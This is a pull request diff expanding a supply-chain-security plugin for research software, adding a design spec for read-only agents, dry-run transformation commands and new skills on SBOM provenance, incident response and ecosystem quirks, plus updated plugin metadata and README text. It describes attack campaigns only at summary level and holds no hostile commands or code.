### PR TITLE
Expand supply-chain-security plugin: 2 agents, 5 commands, 3 new skills

### DIFF
--- a/docs/superpowers/specs/2026-05-14-supply-chain-security-expansion-design.md
+++ b/docs/superpowers/specs/2026-05-14-supply-chain-security-expansion-design.md
@@ -1,0 +1,304 @@
+# Supply Chain Security Plugin — Expansion Design
+
+**Date:** 2026-05-14
+**Status:** Proposed
+**Author:** Cordero Core (with brainstorming assistance)
+**Builds on:** PR #102 (`feat/supply-chain-security-skills`) — adds 3 skills
+**Related:** UWS-58
+
+---
+
+## Problem
+
+The `supply-chain-security` plugin introduced in PR #102 ships three skills covering hardened CI/CD, dependency security, and threat awareness. The plugin is functional but skill-only — it has no agents to coordinate work, no slash commands for users to invoke, and only one of two structural axes is covered (capability-shaped, no ecosystem-shaped guidance for npm/PyPI/conda/pixi/cargo/Go quirks).
+
+One of the three skills (`supply-chain-threat-awareness`) currently fails the Tessl PR Skill Review with a score of 73 (threshold is 80), blocking PR #102 from merging.
+
+## Goals
+
+1. Expand the plugin into a flagship supply-chain-security capability with agents, commands, and additional skills.
+2. Apply progressive disclosure best practices (`references/`, `assets/`) to all new skills and to the failing `supply-chain-threat-awareness` skill.
+3. Ensure every changed `SKILL.md` passes the Tessl review (≥80, target ≥85 local).
+4. Keep transformation actions safe — read-only by default, dry-run preview before any write.
+
+## Non-goals
+
+- Restructure the two skills already scoring 100 (`supply-chain-hardened-ci-cd`, `supply-chain-dependency-security`). Risk vs reward doesn't justify it; can be a follow-up PR.
+- Cover ecosystems beyond npm, PyPI, conda/pixi, cargo, Go in this round (no R/CRAN, no Maven, no NuGet).
+- Build a separate `supply-chain-secret-rotation` skill. Rotation lives inside `supply-chain-incident-response/references/secret-rotation.md` and inside future updates to `supply-chain-hardened-ci-cd`.
+- Auto-rotate secrets or auto-publish anything. Commands operate on local files only; users remain in control of registry actions.
+
+## Architecture
+
+### Final plugin structure
+
+```
+plugins/supply-chain-security/
+├── .claude-plugin/plugin.json
+├── README.md                                    (updated for new components)
+├── agents/
+│   ├── supply-chain-security-expert.md          (NEW — always-on lead)
+│   └── supply-chain-incident-responder.md       (NEW — IR specialist)
+├── commands/
+│   ├── supply-chain-audit.md                    (NEW — read-only)
+│   ├── supply-chain-incident.md                 (NEW — read-only walkthrough)
+│   ├── supply-chain-lockfile-check.md           (NEW — read-only)
+│   ├── supply-chain-pin-actions.md              (NEW — dry-run by default)
+│   └── supply-chain-harden-workflow.md          (NEW — dry-run by default)
+└── skills/
+    ├── supply-chain-hardened-ci-cd/             (UNCHANGED — Tessl 100)
+    │   └── SKILL.md
+    ├── supply-chain-dependency-security/        (UNCHANGED — Tessl 100)
+    │   └── SKILL.md
+    ├── supply-chain-threat-awareness/           (RESTRUCTURED — fix Tessl 73 → ≥85)
+    │   ├── SKILL.md
+    │   └── references/campaigns/
+    │       ├── shai-hulud.md
+    │       ├── teampcp.md
+    │       ├── axios.md
+    │       └── litellm-pth.md
+    ├── supply-chain-sbom-provenance/            (NEW)
+    │   ├── SKILL.md
+    │   ├── references/
+    │   │   ├── sigstore-cookbook.md
+    │   │   └── slsa-levels.md
+    │   └── assets/sbom-workflow.yml
+    ├── supply-chain-incident-response/          (NEW)
+    │   ├── SKILL.md
+    │   ├── references/
+    │   │   ├── runbook-account-takeover.md
+    │   │   ├── runbook-tag-hijack.md
+    │   │   └── secret-rotation.md
+    │   └── assets/incident-report-template.md
+    └── supply-chain-ecosystem-quirks/           (NEW)
+        ├── SKILL.md
+        └── references/
+            ├── npm-quirks.md
+            ├── pypi-quirks.md
+            ├── conda-pixi-quirks.md
+            └── cargo-go-quirks.md
+```
+
+**Totals added by this design:** 2 agents, 5 commands, 3 new skills, 1 restructured skill, 13 reference docs, 2 assets.
+
+### Component boundaries
+
+| Component | Engages when | Writes files? |
+|-----------|--------------|---------------|
+| `supply-chain-security-expert` (agent) | Posture audits, hardening recs, advisory work | No (recommends only) |
+| `supply-chain-incident-responder` (agent) | Active CVE/advisory/compromise reported | No (recommends only) |
+| `/supply-chain-audit` | User audits a repo | No |
+| `/supply-chain-incident` | User responds to a named advisory/campaign | No |
+| `/supply-chain-lockfile-check` | User checks lockfile health | No |
+| `/supply-chain-pin-actions` | Convert mutable refs to SHAs in workflows | Yes, with `--apply` |
+| `/supply-chain-harden-workflow` | Apply hardening playbook to one workflow | Yes, with `--apply` |
+| All skills | Loaded by agents/commands as needed | N/A |
+
+**Key invariants:**
+- Agents never write files directly — all writes go through transformation commands the user invokes.
+- Transformation commands always preview a unified diff first; `--apply` is required to write.
+- Read-only commands link to transformation commands in their findings (composable workflow).
+
+## Agents
+
+### `supply-chain-security-expert.md` (always-on lead)
+
+Frontmatter (excerpt):
+```yaml
+name: supply-chain-security-expert
+description: Expert in defending research software against 2025-2026 supply-chain attacks. Covers GitHub Actions hardening, dependency hygiene, SBOM/provenance, threat posture, and ecosystem-specific gotchas (npm, PyPI, conda/pixi, cargo, Go).
+color: red
+model: inherit
+skills:
+  - supply-chain-hardened-ci-cd
+  - supply-chain-dependency-security
+  - supply-chain-threat-awareness
+  - supply-chain-sbom-provenance
+  - supply-chain-ecosystem-quirks
+```
+
+**Body sections:** Purpose · Workflow patterns (audit / harden / advise) · Constraints · Decision-making framework · Key preferences · Behavioral traits · Response approach · Escalation strategy · Completion criteria.
+
+**Defers to incident-responder when:** active CVE/advisory/compromise reported; user mentions "we got popped" / "compromised dep" / "need to rotate"; package they depend on is in a published advisory.
+
+**Constraints (non-exhaustive):**
+- Read-only by its own actions; never edits files.
+- Always recommends `/supply-chain-audit` before recommending `/supply-chain-pin-actions` or `/supply-chain-harden-workflow` (audit-then-fix flow).
+- Treats CVE-scanner-clean as necessary, not sufficient.
+
+### `supply-chain-incident-responder.md` (narrow specialist)
+
+Frontmatter (excerpt):
+```yaml
+name: supply-chain-incident-responder
+description: Incident-response specialist for active supply-chain compromises. Engages on Shai-Hulud-style maintainer takeovers, TeamPCP-style tag hijacks, and any active dependency advisory. Owns the lockfile-check → CI-cache-check → secret-rotation → persistence-artifact-hunt runbook end-to-end.
+color: red
+model: inherit
+skills:
+  - supply-chain-incident-response
+  - supply-chain-dependency-security
+  - supply-chain-threat-awareness
+  - supply-chain-ecosystem-quirks
+```
+
+**Workflow phases:** Triage → Containment → Eradication → Recovery → Post-incident.
+
+**Constraints (non-exhaustive):**
+- Always runs the 4-point check (lockfile, CI cache, secrets, persistence) before declaring an incident contained.
+- Documents every action for the post-incident report.
+- Defers to lead expert for proactive hardening recommendations after the incident is closed.
+
+## Commands
+
+### Read-only
+
+**`/supply-chain-audit [path]`**
+- Tools: `Read, Glob, Grep, Bash`
+- Walks the repo: `.github/workflows/*.yml`, lockfiles, `package.json` scripts, Python `site-packages/*.pth`, `.npmrc`, secrets in env.
+- Output: structured Markdown report — counts per category, FAIL/WARN/PASS table, prioritized findings with `file:line`, top-3 priority actions, links to remediation skills/commands.
+- Mirrors `/container-audit` shape.
+
+**`/supply-chain-incident <advisory-or-package>`**
+- Tools: `Read, Glob, Grep, Bash, WebFetch`
+- Engages incident-responder agent. Argument can be a CVE ID, GHSA, package name, or campaign name.
+- Walks user through: confirm scope from advisory → lockfile check → CI cache check → secret rotation prompts → persistence artifact hunt.
+- Output: filled-in incident report from `assets/incident-report-template.md`.
+
+**`/supply-chain-lockfile-check [path]`**
+- Tools: `Read, Glob, Grep, Bash`
+- Narrow: lockfile health only (committed? CI usage? hash-pinned? floating versions? cooldown discipline visible from git history?).
+- Output: short Markdown — one section per detected lockfile, PASS/WARN/FAIL on each criterion, recommended fix.
+
+### Transformation (dry-run by default; `--apply` to write)
+
+**`/supply-chain-pin-actions [path] [--apply]`**
+- Tools: `Read, Glob, Grep, Edit, Bash, WebFetch`
+- Scans `.github/workflows/*.yml`, finds every mutable `uses:` ref (`@v4`, `@main`, `@latest`), resolves each to the 40-char SHA via `gh api repos/<owner>/<repo>/git/refs/tags/<tag>` or `git ls-remote`, adds the tag as a trailing `# v4.2.2` comment.
+- Default behavior: prints unified diff per file and stops.
+- Refuses to apply if a SHA can't be uniquely resolved.
+
+**`/supply-chain-harden-workflow <path> [--apply]`**
+- Tools: `Read, Edit, Bash`
+- Targets one workflow file. Applies the hardening playbook from `supply-chain-hardened-ci-cd`: deny-by-default `permissions: {}`, per-job opt-in, two-job build/publish split where appropriate, `--ignore-scripts` on install steps, `harden-runner` step injection, `environment:` gate suggestion on publish job.
+- Default behavior: unified diff preview + a "what this changes and why" summary.
+- Refuses to apply if the file is too divergent from a recognizable shape.
+
+### Cross-cutting conventions
+
+1. Every command's output contract is part of its `description` so the model produces the right artifact.
+2. Transformation commands always preview-then-apply; never silent writes.
+3. Read-only commands link to transformation commands in their findings (composable workflow).
+
+## Skills
+
+### Existing skills
+
+- **`supply-chain-hardened-ci-cd/SKILL.md`** — unchanged (Tessl 100).
+- **`supply-chain-dependency-security/SKILL.md`** — unchanged (Tessl 100).
+- **`supply-chain-threat-awareness/SKILL.md`** — restructured:
+  - Add `## Output: Posture Report` section (the missing element that scored it 73).
+  - Tighten description to name file paths (`.github/workflows/*.yml`, `package.json`, `pyproject.toml`, `pixi.toml`).
+  - Move campaign deep-dives to `references/campaigns/` (one file per campaign), declared in `metadata.references`.
+  - SKILL.md keeps a one-paragraph summary of each campaign + the new output contract.
+
+### New skills
+
+All three follow the five-element Tessl bar (see Tessl strategy below). All three use progressive disclosure (`references/`, `assets/` declared in `metadata`).
+
+**`supply-chain-sbom-provenance/SKILL.md`**
+- Use when: generating an SBOM, configuring Sigstore signing, verifying a downstream artifact's provenance, evaluating SLSA level for a release pipeline.
+- Body: Threat model → Quick decision matrix (npm provenance vs Sigstore vs SLSA generator) → Generation checklist → Verification checklist → `## Output: Provenance Posture Report`.
+- `references/sigstore-cookbook.md` — cosign sign/verify recipes, keyless flow with OIDC, transparency log lookup.
+- `references/slsa-levels.md` — what each SLSA level (1-4) requires, how to graduate, what's reasonable for research software.
+- `assets/sbom-workflow.yml` — drop-in GitHub Actions job (CycloneDX SBOM via syft, Sigstore attestation, release asset upload).
+
+**`supply-chain-incident-response/SKILL.md`**
+- Use when: an advisory, CVE, or campaign report names a dependency or action this project uses. Engaged by `/supply-chain-incident` and the incident-responder agent.
+- Body: Triage flow → 4-point check (lockfile, CI cache, secrets, persistence) → Containment / Eradication / Recovery / Post-incident phases → `## Output: Incident Report` (filled template).
+- `references/runbook-account-takeover.md` — Shai-Hulud-style maintainer compromise (npm focus).
+- `references/runbook-tag-hijack.md` — TeamPCP-style retroactive tag mutation; SHA-pinning audit, action repo verification, GitHub Actions cache invalidation.
+- `references/secret-rotation.md` — per-platform rotation (PyPI tokens, npm tokens, GitHub Actions secrets, signing keys, cloud creds via OIDC); safe-rotation order; OIDC migration as the durable fix.
+- `assets/incident-report-template.md` — Markdown template (scope, timeline, eradication actions, residual risk, prevention items).
+
+**`supply-chain-ecosystem-quirks/SKILL.md`**
+- Use when: a recommendation depends on ecosystem specifics.
+- Body: Pure progressive-disclosure index. Brief one-paragraph summary per ecosystem, then "load `references/<eco>-quirks.md` for the deep dive." Compact checklist of "which reference applies to your project" + `## Output: Ecosystem Quirks Report`.
+- `references/npm-quirks.md` — preinstall/postinstall/install hooks, `.npmrc` knobs, `npm ci` vs `npm install`, npm provenance attestations.
+- `references/pypi-quirks.md` — `.pth` files (LiteLLM-class persistence), `setup.py` execution at install, `build_wheel`/`backend-path` in `pyproject.toml`, OIDC trusted publishing recipes.
+- `references/conda-pixi-quirks.md` — channel priority and `defaults` channel risk, `pixi.lock` vs `conda-lock.yml`, `--no-deps` and `--no-pin`, signed channel verification status.
+- `references/cargo-go-quirks.md` — Cargo `build.rs` arbitrary execution, `.cargo/config.toml` registries, Go `//go:generate` directives, GOPROXY and `GOSUMDB` discipline.
+
+### Skill cross-linking
+
+Cross-links happen in prose, not via shared imports — keeps each skill standalone-readable:
+- `supply-chain-incident-response` references campaigns from `supply-chain-threat-awareness`.
+- `supply-chain-sbom-provenance` references `supply-chain-hardened-ci-cd`'s two-job split for the publish job.
+- `supply-chain-ecosystem-quirks` is referenced by `supply-chain-dependency-security` and `supply-chain-incident-response`.
+
+## Tessl-passing strategy
+
+The Tessl GitHub Action runs on every changed `SKILL.md` and fails if any score is below 80. Threshold is set at the workflow level. Every changed skill must clear 80.
+
+### Five-element bar (every changed/new SKILL.md gets these in this order)
+
+1. **Trigger-rich description** — names file paths, manifest types, or events.
+2. **Threat or context paragraph** — one short paragraph framing the *why*, with a concrete campaign or recent CVE as evidence.
+3. **Verifiable checklist** — each item answers "what would I run or read to confirm this?"
+4. **At least one runnable example** — code block showing bad pattern, good pattern, and diff.
+5. **`## Output:` section** — explicit output contract: artifact, sections, fields.
+
+### Per-skill risk + mitigation
+
+| Skill | Risk | Mitigation |
+|-------|------|------------|
+| `supply-chain-threat-awareness` (restructured) | Low — near-miss at 73 | Add output contract + tighten description |
+| `supply-chain-sbom-provenance` (new) | Low — concrete tools, file triggers | All five elements from start |
+| `supply-chain-incident-response` (new) | Medium — IR can drift narrative | Phase-ordered checklists + templated output |
+| `supply-chain-ecosystem-quirks` (new) | High — short index skill | Compact form of all five elements; explicit ≥85 target |
+
+### Local validation loop
+
+Before push, run `tessl skill review <path>` on each modified/new SKILL.md. Target: every skill ≥85 locally → ≥80 in CI with margin. If any skill scores 70-79 in CI, identify weak element from log and revise. If a skill scores <70, demote to a `references/` doc within a related skill — don't ship as a top-level SKILL.md.
+
+### CI surface area
+
+When the expanded PR opens, Tessl reviews **4 changed SKILL.md files** (threat-awareness modified + 3 new). The two unchanged skills (hardened-ci-cd, dependency-security) are not re-reviewed.
+
+## Implementation order
+
+1. Restructure `supply-chain-threat-awareness` (fix the Tessl 73 first — unblocks PR #102 if shipped standalone).
+2. Add the three new skills with full progressive disclosure.
+3. Add the two agents.
+4. Add the five commands.
+5. Update `README.md` and bump `plugin.json` version (0.1.0 → 0.2.0).
+6. Run Tessl locally on all 4 changed SKILL.md files.
+7. Push and open expanded PR (or update PR #102 in place).
+
+## Open questions
+
+None blocking. Decisions made during brainstorming:
+- Scope: comprehensive empire (option C).
+- Write model: mixed read-only / write-with-dry-run (option C).
+- Skill carving: hybrid capability + ecosystem-quirks reference skill (option C).
+- Agent split: lead + incident-responder (option A).
+- Existing-skill rework depth: light alignment — fix threat-awareness only (option B).
+
+## Risks
+
+| Risk | Likelihood | Impact | Mitigation |
+|------|------------|--------|------------|
+| Restructured threat-awareness re-scores below 80 | Low | Blocks PR | Local validation gate before push; add more verifiable checklist items |
+| `supply-chain-ecosystem-quirks` (short index skill) scores below 80 | Medium | Blocks PR | Pre-push local Tessl run; if <80, fold ecosystem references into `dependency-security/references/` instead of a standalone skill |
+| Transformation commands write incorrect changes | Medium | User trust | Dry-run default; refuse-to-apply on ambiguity; explicit `--apply` flag |
+| `/supply-chain-pin-actions` resolves wrong SHA for a tag | Low | Silent supply-chain risk | Verify against `git ls-remote` upstream; print resolved SHA in diff for human review |
+| Plugin sprawl reduces discoverability | Low | UX | Updated README with clear "when to use what" guide |
+
+## Success criteria
+
+- All 4 changed/new SKILL.md files pass Tessl in CI (≥80, target ≥85 local).
+- Both agents load and route to correct skills when invoked.
+- All 5 commands are user-invocable and produce documented output.
+- Read-only commands never write files.
+- Transformation commands never write without `--apply`.
+- README documents the full agent/command/skill surface and gives a "when to use what" decision guide.
+- Plugin version bumped to 0.2.0.

--- a/plugins/supply-chain-security/.claude-plugin/plugin.json
+++ b/plugins/supply-chain-security/.claude-plugin/plugin.json
@@ -1,0 +1,31 @@
+{
+    "name": "supply-chain-security",
+    "version": "0.1.0",
+    "description": "Supply-chain security skills for research software projects. Covers 2025–2026 threat campaigns (Shai-Hulud, TeamPCP, axios, LiteLLM), hardened GitHub Actions release workflows, SHA-pinned actions, OIDC Trusted Publishing, lockfile hygiene, lifecycle-script disabling, SLSA provenance, and incident response runbooks.",
+    "category": "security",
+    "strict": false,
+    "author": {
+        "name": "SSEC Research Team",
+        "url": "https://github.com/uw-ssec"
+    },
+    "homepage": "https://github.com/uw-ssec/rse-plugins",
+    "repository": "https://github.com/uw-ssec/rse-plugins",
+    "license": "BSD-3-Clause",
+    "keywords": [
+        "supply-chain-security",
+        "github-actions",
+        "sha-pinning",
+        "oidc",
+        "trusted-publishing",
+        "lockfile",
+        "sbom",
+        "slsa",
+        "provenance",
+        "dependency-security",
+        "threat-awareness",
+        "pwn-request",
+        "npm",
+        "pypi",
+        "research-software"
+    ]
+}

--- a/plugins/supply-chain-security/.claude-plugin/plugin.json
+++ b/plugins/supply-chain-security/.claude-plugin/plugin.json
@@ -1,7 +1,7 @@
 {
     "name": "supply-chain-security",
-    "version": "0.1.0",
-    "description": "Supply-chain security skills for research software projects. Covers 2025–2026 threat campaigns (Shai-Hulud, TeamPCP, axios, LiteLLM), hardened GitHub Actions release workflows, SHA-pinned actions, OIDC Trusted Publishing, lockfile hygiene, lifecycle-script disabling, SLSA provenance, and incident response runbooks.",
+    "version": "0.2.0",
+    "description": "Supply-chain security plugin for research software. 2 agents (lead expert + incident responder), 5 commands (audit, incident, lockfile-check, pin-actions, harden-workflow), 6 skills covering hardened CI/CD, dependency security, threat awareness, SBOM/provenance, incident response, and ecosystem-specific quirks (npm, PyPI, conda/pixi, cargo, Go). Covers 2025-2026 campaigns: Shai-Hulud, TeamPCP, axios, LiteLLM .pth persistence.",
     "category": "security",
     "strict": false,
     "author": {
@@ -19,13 +19,23 @@
         "trusted-publishing",
         "lockfile",
         "sbom",
+        "cyclonedx",
+        "spdx",
+        "sigstore",
+        "cosign",
         "slsa",
         "provenance",
         "dependency-security",
         "threat-awareness",
+        "incident-response",
         "pwn-request",
+        "harden-runner",
         "npm",
         "pypi",
+        "conda",
+        "pixi",
+        "cargo",
+        "go",
         "research-software"
     ]
 }

--- a/plugins/supply-chain-security/README.md
+++ b/plugins/supply-chain-security/README.md
@@ -1,0 +1,112 @@
+# Supply Chain Security Plugin
+
+Three focused skills for defending research software projects against the 2025–2026 wave of open-source supply-chain attacks — maintainer account takeovers, release-tag hijacking, lifecycle-script execution, and CI secret harvesting. Derived from the UW SSEC Open Source Supply Chain Security document.
+
+## Overview
+
+**Version:** 0.1.0
+
+**Contents:**
+- 3 Skills: Supply Chain Hardened CI/CD, Supply Chain Dependency Security, Supply Chain Threat Awareness
+
+## Why This Exists
+
+CVE scanners and Dependabot catch known-vulnerable versions. They do **not** catch:
+
+- Maintainer account takeover of a package that was clean yesterday (Shai-Hulud: 500+ npm packages)
+- Release-tag hijacking after a legitimate release (TeamPCP: Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP)
+- Malicious `.pth` files that persist across Python restarts (LiteLLM 1.82.8)
+- GitHub Actions `@v4` references silently updated to malicious commits
+
+These three skills provide the checklists, patterns, and incident runbooks to close those gaps.
+
+## Plugin Structure
+
+```
+supply-chain-security/
+├── .claude-plugin/
+│   └── plugin.json
+├── skills/
+│   ├── supply-chain-hardened-ci-cd/
+│   │   └── SKILL.md
+│   ├── supply-chain-dependency-security/
+│   │   └── SKILL.md
+│   └── supply-chain-threat-awareness/
+│       └── SKILL.md
+└── README.md
+```
+
+## Available Skills
+
+### Supply Chain Hardened CI/CD
+
+**File:** [skills/supply-chain-hardened-ci-cd/SKILL.md](skills/supply-chain-hardened-ci-cd/SKILL.md)
+
+**Description:** Hardened GitHub Actions release workflow patterns for supply-chain security. Use when reviewing or writing GitHub Actions release workflows (`.github/workflows/*.yml`).
+
+**Key topics:**
+- SHA-pinning all `uses:` references to 40-character commit SHAs
+- OIDC Trusted Publishing (no long-lived PyPI/npm tokens)
+- Two-job build/publish split with environment-gated publish job
+- Deny-by-default `permissions: {}` with per-job opt-in
+- Pwn Request prevention (`pull_request_target` patterns)
+- `--ignore-scripts` for npm install steps
+- Egress hardening with `harden-runner`
+- SLSA provenance and artifact verification
+
+**When to use:**
+- Reviewing `.github/workflows/*.yml` for release/publish workflows
+- Writing a new release workflow from scratch
+- Responding to a TeamPCP-style tag-hijack incident
+
+---
+
+### Supply Chain Dependency Security
+
+**File:** [skills/supply-chain-dependency-security/SKILL.md](skills/supply-chain-dependency-security/SKILL.md)
+
+**Description:** Dependency and lockfile supply-chain security review with 2025–2026 attack campaign patterns. Use when reviewing `package.json`, `pyproject.toml`, `requirements.txt`, `pixi.toml`, `conda-lock.yml`, or any lockfile.
+
+**Key topics:**
+- Lockfile hygiene (committing, using in CI with `npm ci`, `uv sync --frozen`, `pixi install`)
+- Install-time script execution vectors (`preinstall`/`postinstall`, Python `.pth` files)
+- Dependency freshness cooldown (≥7 days before merging new deps)
+- Incident response runbook: affected version range → lockfile check → CI cache check → secret rotation → persistence artifacts
+
+**When to use:**
+- Reviewing any dependency manifest or lockfile
+- Evaluating a new dependency for addition
+- Responding to a supply-chain compromise advisory
+
+---
+
+### Supply Chain Threat Awareness
+
+**File:** [skills/supply-chain-threat-awareness/SKILL.md](skills/supply-chain-threat-awareness/SKILL.md)
+
+**Description:** Supply chain threat posture assessment for projects and packages. Use when auditing a project's overall supply-chain posture or assessing exposure to active campaigns.
+
+**Key topics:**
+- Shai-Hulud (500+ npm packages via maintainer account takeover)
+- TeamPCP (Trivy, Checkmarx, LiteLLM, Bitwarden CLI, SAP CAP via release-tag hijacking)
+- axios (100M weekly downloads; maintainer account compromise)
+- LiteLLM 1.82.8 (malicious `.pth` file for persistent Python execution)
+- CVE scanner limitations — what scanners miss and why
+- Posture assessment checklist (lockfiles, action pinning, install-time execution, dependency velocity, SBOM)
+
+**When to use:**
+- Starting a security review of a project
+- Assessing whether a specific package or workflow is at risk
+- Onboarding a project to supply-chain security practices
+
+## Getting Started
+
+Load individual skills when you need focused guidance on a specific area:
+
+- **Reviewing a GitHub Actions workflow** → load `supply-chain-hardened-ci-cd`
+- **Reviewing dependencies or a lockfile** → load `supply-chain-dependency-security`
+- **Starting an overall security posture review** → load `supply-chain-threat-awareness`
+
+## License
+
+This plugin is part of the RSE Plugins project and is licensed under the BSD-3-Clause License. See [LICENSE](../../LICENSE) for details.

--- a/plugins/supply-chain-security/README.md
+++ b/plugins/supply-chain-security/README.md
@@ -1,13 +1,15 @@
 # Supply Chain Security Plugin
 
-Three focused skills for defending research software projects against the 2025–2026 wave of open-source supply-chain attacks — maintainer account takeovers, release-tag hijacking, lifecycle-script execution, and CI secret harvesting. Derived from the UW SSEC Open Source Supply Chain Security document.
+A flagship plugin for defending research software projects against the 2025–2026 wave of open-source supply-chain attacks — maintainer account takeovers, release-tag hijacking, lifecycle-script execution, CI secret harvesting, and persistence-on-Python-restart `.pth` injection. Derived from the UW SSEC Open Source Supply Chain Security document.
 
 ## Overview
 
-**Version:** 0.1.0
+**Version:** 0.2.0
 
 **Contents:**
-- 3 Skills: Supply Chain Hardened CI/CD, Supply Chain Dependency Security, Supply Chain Threat Awareness
+- 2 Agents: `supply-chain-security-expert` (always-on lead), `supply-chain-incident-responder` (active incidents)
+- 5 Commands: `/supply-chain-audit`, `/supply-chain-incident`, `/supply-chain-lockfile-check`, `/supply-chain-pin-actions`, `/supply-chain-harden-workflow`
+- 6 Skills: `supply-chain-hardened-ci-cd`, `supply-chain-dependency-security`, `supply-chain-threat-awareness`, `supply-chain-sbom-provenance`, `supply-chain-incident-response`, `supply-chain-ecosystem-quirks`
 
 ## Why This Exists
 
@@ -18,94 +20,104 @@ CVE scanners and Dependabot catch known-vulnerable versions. They do **not** cat
 - Malicious `.pth` files that persist across Python restarts (LiteLLM 1.82.8)
 - GitHub Actions `@v4` references silently updated to malicious commits
 
-These three skills provide the checklists, patterns, and incident runbooks to close those gaps.
+This plugin provides agents that coordinate the work, slash commands for concrete user actions, and skills that contain the deep checklists, patterns, runbooks, and ecosystem-specific quirks needed to close those gaps.
+
+## When to Use What
+
+| Situation | Start with |
+|-----------|------------|
+| New project — establish baseline supply-chain posture | `/supply-chain-audit` |
+| Reviewing a single workflow file | `supply-chain-hardened-ci-cd` skill |
+| Reviewing dependencies or a lockfile | `/supply-chain-lockfile-check` or `supply-chain-dependency-security` skill |
+| Got a CVE/GHSA/advisory naming a dep we use | `/supply-chain-incident <id>` |
+| Workflows have `@v4` / `@main` / `@latest` refs | `/supply-chain-pin-actions` (dry-run first) |
+| Workflow needs hardening (permissions, two-job split, etc.) | `/supply-chain-harden-workflow <file>` (dry-run first) |
+| Adding SBOM / Sigstore signing to a release pipeline | `supply-chain-sbom-provenance` skill |
+| Question about npm/PyPI/conda/pixi/cargo/Go-specific gotchas | `supply-chain-ecosystem-quirks` skill |
+
+## Agents
+
+### supply-chain-security-expert (always-on lead)
+
+**File:** [agents/supply-chain-security-expert.md](agents/supply-chain-security-expert.md)
+
+Owns proactive posture work, hardening recommendations, SBOM/provenance upgrades, and ecosystem-specific guidance. Read-only by its own actions — writes happen through user-invoked transformation commands. Defers active incidents to the incident responder.
+
+### supply-chain-incident-responder (incident specialist)
+
+**File:** [agents/supply-chain-incident-responder.md](agents/supply-chain-incident-responder.md)
+
+Engages when an advisory, CVE, GHSA, or campaign report names a dependency or GitHub Action this project uses. Owns the lockfile → CI cache → secrets → persistence 4-point check end-to-end and produces a filled incident report.
+
+## Commands
+
+### Read-only
+
+| Command | Purpose |
+|---------|---------|
+| `/supply-chain-audit [path]` | Full posture audit across workflows, lockfiles, install scripts, persistence vectors. Structured Markdown report with FAIL/WARN/PASS findings. |
+| `/supply-chain-incident <id>` | Walk through 4-point check for an advisory/CVE/campaign. Produces a filled incident report. |
+| `/supply-chain-lockfile-check [path]` | Narrow lockfile-only health check. |
+
+### Transformation (dry-run by default; `--apply` to write)
+
+| Command | Purpose |
+|---------|---------|
+| `/supply-chain-pin-actions [path] [--apply]` | Convert mutable `uses:` refs to 40-char SHAs with trailing tag comments. Refuses on branch refs. |
+| `/supply-chain-harden-workflow <file> [--apply]` | Apply the hardening playbook to one workflow. Refuses if the workflow needs a manual restructure (e.g., single-job build+publish). |
+
+## Skills
+
+| Skill | Purpose | Progressive disclosure |
+|-------|---------|------------------------|
+| `supply-chain-hardened-ci-cd` | GitHub Actions release workflow hardening checklist | — |
+| `supply-chain-dependency-security` | Dependency and lockfile security review | — |
+| `supply-chain-threat-awareness` | Posture assessment against active campaigns | `references/campaigns/` (Shai-Hulud, TeamPCP, axios, LiteLLM .pth), `references/posture-report-template.md` |
+| `supply-chain-sbom-provenance` | SBOM generation, Sigstore signing, SLSA levels | `references/` (sigstore cookbook, slsa levels), `assets/sbom-workflow.yml` |
+| `supply-chain-incident-response` | IR runbook owning the 4-point check | `references/` (account-takeover runbook, tag-hijack runbook, secret rotation), `assets/incident-report-template.md` |
+| `supply-chain-ecosystem-quirks` | Ecosystem-specific install-time execution gotchas | `references/` (npm, PyPI, conda/pixi, cargo, Go quirks) |
 
 ## Plugin Structure
 
 ```
 supply-chain-security/
-├── .claude-plugin/
-│   └── plugin.json
-├── skills/
-│   ├── supply-chain-hardened-ci-cd/
-│   │   └── SKILL.md
-│   ├── supply-chain-dependency-security/
-│   │   └── SKILL.md
-│   └── supply-chain-threat-awareness/
-│       └── SKILL.md
-└── README.md
+├── .claude-plugin/plugin.json
+├── README.md
+├── agents/
+│   ├── supply-chain-security-expert.md
+│   └── supply-chain-incident-responder.md
+├── commands/
+│   ├── supply-chain-audit.md
+│   ├── supply-chain-incident.md
+│   ├── supply-chain-lockfile-check.md
+│   ├── supply-chain-pin-actions.md
+│   └── supply-chain-harden-workflow.md
+└── skills/
+    ├── supply-chain-hardened-ci-cd/SKILL.md
+    ├── supply-chain-dependency-security/SKILL.md
+    ├── supply-chain-threat-awareness/
+    │   ├── SKILL.md
+    │   └── references/
+    │       ├── campaigns/{shai-hulud,teampcp,axios,litellm-pth}.md
+    │       └── posture-report-template.md
+    ├── supply-chain-sbom-provenance/
+    │   ├── SKILL.md
+    │   ├── references/{sigstore-cookbook,slsa-levels}.md
+    │   └── assets/sbom-workflow.yml
+    ├── supply-chain-incident-response/
+    │   ├── SKILL.md
+    │   ├── references/{runbook-account-takeover,runbook-tag-hijack,secret-rotation}.md
+    │   └── assets/incident-report-template.md
+    └── supply-chain-ecosystem-quirks/
+        ├── SKILL.md
+        └── references/{npm,pypi,conda-pixi,cargo-go}-quirks.md
 ```
 
-## Available Skills
+## Safety model
 
-### Supply Chain Hardened CI/CD
-
-**File:** [skills/supply-chain-hardened-ci-cd/SKILL.md](skills/supply-chain-hardened-ci-cd/SKILL.md)
-
-**Description:** Hardened GitHub Actions release workflow patterns for supply-chain security. Use when reviewing or writing GitHub Actions release workflows (`.github/workflows/*.yml`).
-
-**Key topics:**
-- SHA-pinning all `uses:` references to 40-character commit SHAs
-- OIDC Trusted Publishing (no long-lived PyPI/npm tokens)
-- Two-job build/publish split with environment-gated publish job
-- Deny-by-default `permissions: {}` with per-job opt-in
-- Pwn Request prevention (`pull_request_target` patterns)
-- `--ignore-scripts` for npm install steps
-- Egress hardening with `harden-runner`
-- SLSA provenance and artifact verification
-
-**When to use:**
-- Reviewing `.github/workflows/*.yml` for release/publish workflows
-- Writing a new release workflow from scratch
-- Responding to a TeamPCP-style tag-hijack incident
-
----
-
-### Supply Chain Dependency Security
-
-**File:** [skills/supply-chain-dependency-security/SKILL.md](skills/supply-chain-dependency-security/SKILL.md)
-
-**Description:** Dependency and lockfile supply-chain security review with 2025–2026 attack campaign patterns. Use when reviewing `package.json`, `pyproject.toml`, `requirements.txt`, `pixi.toml`, `conda-lock.yml`, or any lockfile.
-
-**Key topics:**
-- Lockfile hygiene (committing, using in CI with `npm ci`, `uv sync --frozen`, `pixi install`)
-- Install-time script execution vectors (`preinstall`/`postinstall`, Python `.pth` files)
-- Dependency freshness cooldown (≥7 days before merging new deps)
